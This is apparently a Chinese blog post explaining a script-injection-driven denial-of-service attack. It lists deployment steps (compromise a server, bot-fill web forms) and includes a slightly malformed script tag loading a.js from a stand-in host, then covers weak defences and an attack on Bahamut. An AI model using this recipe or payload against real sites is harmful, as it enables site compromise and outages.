@基本上這種攻擊由於攻擊緒是合法的封包,幾乎無法防禦。
架過網站的,大都吃過這種攻擊封包。
網站如果發現反應鈍鈍的,大都是面臨這種類型的攻擊。
由於網站伺服器收到的造訪要求都是合法的,因此幾乎是無從阻擋。
他的原理是先設法讓許多的電腦下載一支javascript程式
然後這些javascript會在瀏覽器被開啟時,也跟著開啟
程式會開啟一個聆聽作業緒,等待攻擊者發出攻擊指令,接到後
即以每秒數百次的瀕率不斷的造訪特定網站。
假設1000台電腦受到感染,這1000台每秒將造訪目標網站達到數萬次
伺服器因太多的登入行為,通常即因過多的作業緒排隊而造成癱瘓
我們來討論這種攻擊手法如何佈署
其實他的方法很簡單
1. 先寫好一支攻擊程式假設是 a.js
2. 將這支a.js先找一台安全性不足的伺服器入侵後,放在假設網域www.name.com 的空間裡
3. 使用機器人程式,隨機搜尋的具有表單的網站
4. 在表單上的全部輸入格全寫入 <script src="http://www.name/com/a.js></script>
是的,就是這麼簡單
當有人造訪這些被寫入<script src="http://www.name/com/a.js></script>的程式碼的網站時
即會下載這支a.js的程式,這己布署完成,接下來就等這些程式的條件被觸發而已
資料庫被寫入這個script src的行為,被稱為是注入式攻擊
因此注入式攻擊意味著,有人在布署阻斷式攻擊
被攻擊的網站,其實幾乎沒有方法可以阻擋
有些人認為只需寫一支入門程式,當用戶在極短時間內連續造訪即行阻擋
問題是,這方法跟本無效
因為這種方法需要將造訪者的IP記錄在資料庫或記憶中,再進行比對
當一秒擁進數十萬次的造訪,這些比對程序,同樣造成巨大的負擔
伺服器照樣癱瘓掉
因此有些防火牆自稱可以解決這個問題
就是在做這件比對訪客IP的工作
當發現每秒登入頻繁的IP即阻擋,如果惡意IP名單沒有的IP即放行
再將連線轉到實際的伺服器上
但如果真的這種防火牆有用,我想大概要裝置數十台才夠。
真正有效的是以巨大的運算能力與頻寬對應
像google或是yahoo他們跟本不再乎每秒多個幾十萬的造訪
因此,唯一有效的方法,似乎是這個方法。
台灣的巴哈姆特,就發生了一個令人瞠目結舌的阻斷式攻擊。
大陸魔獸世界私服想要在巴哈姆特登廣告又不想付錢
即開始攻擊巴哈姆特
其間還打電話或寫信給巴哈姆特要求登廣告
巴哈姆特當然拒絕
誰敢答應啊,一旦答應即代表巴哈姆特吃這一套
未來不是予取予求
想出這個以攻擊威脅登廣告方法,真的是白忙半天
但可以理解,巴哈當時的IT忙的焦頭爛額的情況。
這種駭客要抓從攻擊端找log檔是沒有用的
真的要逮人,必需去查放a.js這台伺服器,從那個ip登入的
不過,他即然有能力入侵伺服器再偷偷放上a.js這支程式了
想也知log檔大概也被他刪光了。
留言列表
